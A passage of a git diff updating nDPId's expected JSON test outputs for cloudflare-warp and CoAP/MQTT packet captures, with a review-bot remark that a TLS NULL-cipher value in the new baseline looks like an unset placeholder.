{"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1656230939817,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.217.194.188","src_port":43600,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230934714,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"216.58.196.68","src_port":40454,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656230934714,"flow_last_seen":1656230934714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"216.58.196.68","src_port":40454,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932729,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"142.251.42.106","src_port":55512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656230932729,"flow_last_seen":1656230932729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.158.134.93","dst_ip":"142.251.42.106","src_port":55512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1656230932996,"flow_last_seen":1656230933366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"159.138.85.48","src_port":42344,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 
+00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1656230939763,"flow_last_seen":1656230939766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"142.250.183.163","src_port":51296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1656230939663,"flow_last_seen":1656230939818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2837,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1656230939671,"flow_last_seen":1656230939819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2800,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.18.47.234","src_port":45610,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CloudflareWarp","breed":"Acceptable","category":"VPN"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1656230934073,"flow_last_seen":1656230934969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1656230939819,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.16.32","src_port":40214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":63,"source":"cloudflare-warp.pcap","alias":"nDPId-test","packets-captured":63,"packets-processed":63,"total-skipped-flows":0,"total-l4-payload-len":8443,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":5,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1656230939819} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 63/63 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 8443 bytes +~~ total detected protocols..: 5 +~~ total active/idle flows...: 8/8 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6028661 bytes +~~ total memory freed........: 6028661 bytes +~~ total allocations/frees...: 120987/120987 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 464 chars +~~ json string max len.......: 1227 chars 
+~~ json string avg len.......: 844 chars diff --git a/test/results/coap_mqtt.pcap.out b/test/results/coap_mqtt.pcap.out index 387cfba8b..bdadb6bb5 100644 --- a/test/results/coap_mqtt.pcap.out +++ b/test/results/coap_mqtt.pcap.out 
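Review bot: The new cloudflare-warp baseline pins `"cipher":"TLS_NULL_WITH_NULL_NULL"` together with `"unsafe_cipher":0` and `"ja3s":""` on the `detected` events for flows 3, 5, 6 and 7. Because `ja3s` is empty on those events, this looks like an unset default serialized before any ServerHello was parsed, not a negotiated suite. The later `detection-update` events for flows 3, 5 and 6 replace it with a real suite, and flow 3's `version` also moves from `TLSv1.2` to `TLSv1.3`. Flow 7 never gets an update and its `idle` event carries no `ndpi` object, so the placeholder is the only TLS record a consumer sees for it, and a rule matching NULL cipher suites would fire on ordinary traffic. The serializer is outside this hunk, so I would either omit `cipher` while `ja3s` is empty or document that both fields are provisional until it is set, in either case before this output becomes the expected result.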
@@ -2,92 +2,92 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1333957710293} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1333957710293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957710293,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nMWMwAg\/RpDAQXKchYzKy53ZWxsLWtub3duBGNvcmU="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957710293,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1333957715764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957715764,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nQWMwAgAxVDAv\/NchYzKy53ZWxsLWtub3duBGNvcmU="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957715764,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1333957717200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957717200,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nUWMwAgyuNDAzf9chYzKy53ZWxsLWtub3duBGNvcmU="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957717200,"flow_last_seen":1333957717200,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957717200,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61045,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1333957718629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1333957718629,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACARQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7nYWMwAgvHpDBEZkchYzKy53ZWxsLWtub3duBGNvcmU="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957718629,"flow_last_seen":1333957718629,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1333957718629,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61046,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1333957720773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"thread_ts_msec":1333957720773,"pkt":"ACOJtMwBSF1gwJdKht1gAAAAACQRQCABDagCFRFxoQvLSI+DV\/YgAQYgAAg12QAAAAAAAAAQ7ncWMwAkKH5FAYp0chYzKy53ZWxsLWtub3duBGNvcmUQEj3U"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1333957720773,"flow_last_seen":1333957720773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1333957720773,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61047,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":124,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1375090528017} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1375090528017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":81,"pkt_l4_len":27,"thread_ts_msec":1375090528017,"pkt":"uCfrprIvACTop0mhht1gAAAAABsRQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADgtsWMwAblIJCAekbB5C4c2VwYXJhdGUQ0SMR"} 
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1375090528017,"flow_last_seen":1375090528017,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1375090528017,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1375090528127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":66,"pkt_l4_len":12,"thread_ts_msec":1375090528127,"pkt":"ACTop0mhuCfrprIvht1gAAAAAAwRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjOC2wAMpjBgAOkb"} 
00638{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1375090529153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":191,"pkt_l4_len":137,"thread_ts_msec":1375090529153,"pkt":"ACTop0mhuCfrprIvht1gAAAAAIkRQLu7AAAAAAAAAAAAAAAAAAO7uwAAAAAAAAAAAAAAAAABFjOC2wCJMIhCRVcPB5D\/VGhpcyBtZXNzYWdlIHdhcyBzZW50IGJ5IGEgc2VwYXJhdGUgcmVzcG9uc2UuCllvdXIgY2xpZW50IHdpbGwgbmVlZCB0byBhY2tub3dsZWRnZSBpdCwgb3RoZXJ3aXNlIGl0IHdpbGwgYmUgcmV0cmFuc21pdHRlZC4="} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957710293,"flow_last_seen":1333957710293,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61043,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1333957715764,"flow_last_seen":1333957715764,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1375090529165,"l3_proto":"ip6","src_ip":"2001:da8:215:1171:a10b:cb48:8f83:57f6","dst_ip":"2001:620:8:35d9::10","src_port":61044,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
